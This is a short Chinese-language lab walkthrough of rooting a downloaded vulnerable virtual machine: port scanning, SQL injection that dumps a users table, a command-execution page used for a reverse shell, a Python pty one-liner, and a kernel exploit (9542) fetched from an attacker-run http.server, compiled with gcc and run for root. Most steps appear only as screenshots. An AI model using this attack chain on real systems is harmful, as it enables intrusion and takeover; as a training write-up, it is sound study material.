仅供交流与学习使用,请勿用于非法用途
环境搭建
不废话,下载完成,虚拟机打开就行
确定靶机
![](https://img.haomeiwen.com/i17716535/c7b4debdf8e82dc4.png)
扫描端口
![](https://img.haomeiwen.com/i17716535/31f05b65595e8046.png)
确定资产
-
80有web服务
图片.png
寻找漏洞
-
通过抓包分析确定有sql注入漏洞
图片.png
- 得到账户密码
Database: webapp
Table: users
[2 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | 5afac8d85f |
| john | 66lajGGbla |
+----------+------------+
登录用户
-
登录之后发现是命令执行功能
图片.png
![](https://img.haomeiwen.com/i17716535/f920929c81d4b0aa.png)
获取shell
-
直接反弹shell
图片.png
进入交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
提权
lsb_release -a
![](https://img.haomeiwen.com/i17716535/49564b95fd09ce70.png)
查找可用exp
![](https://img.haomeiwen.com/i17716535/5523c16c0fb88a38.png)
- 现在有个问题是怎么把exp弄到服务器上去呢?
搭建简易服务
- Python3 -m http.server 2222开启端口 做一个简易的服务供靶机下载
![](https://img.haomeiwen.com/i17716535/3b65fa7408aa3471.png)
- 因为当前目录没有权限 切换到tmp目录下
![](https://img.haomeiwen.com/i17716535/782009f8cf46120c.png)
编译exp
gcc -o 9542 9542.c
![](https://img.haomeiwen.com/i17716535/3f2522ced4057a2c.png)
编译成功执行exp
![](https://img.haomeiwen.com/i17716535/1022cb97bb6bd759.png)
拿到root权限修改密码
![](https://img.haomeiwen.com/i17716535/65f8c086d8be54e1.png)
去登录服务器
![](https://img.haomeiwen.com/i17716535/68f8f933395a6b99.png)
网友评论